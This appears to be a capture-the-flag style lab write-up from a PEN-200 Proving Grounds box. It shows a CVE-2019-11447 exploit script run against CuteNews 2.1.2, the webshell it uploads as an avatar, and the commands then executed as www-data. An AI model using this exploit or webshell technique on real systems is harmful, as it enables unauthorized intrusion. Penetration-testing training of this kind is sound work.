RCE
The target CuteNews instance has been identified to be vulnerable to CVE-2019-11447 due to its outdated version; 2.1.2
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/bbscute]
└─$ python3 CVE-2019-11447.py http://$IP/
> Attempting to register new user with the following username: lEggXN9l
> Avatar uploaded successfully!
> Example Usage: http://192.168.239.128/uploads/avatar_lEggXN9l_lEggXN9l.php?cmd=whoami
> Do you want to launch a shell? (y/n) y
cmd $ whoami
www-data
cmd $ hostname
cute.calipendula
cmd $ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:46:6d brd ff:ff:ff:ff:ff:ff
inet 192.168.239.128/24 brd 192.168.239.255 scope global ens192
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:fe9e:466d/64 scope link
valid_lft forever preferred_lft foreverExecuting the exploit script registered a new user account and uploaded a webshell as an avatar
Initial Foothold established to the target system as the www-data account via exploiting CVE-2019-11447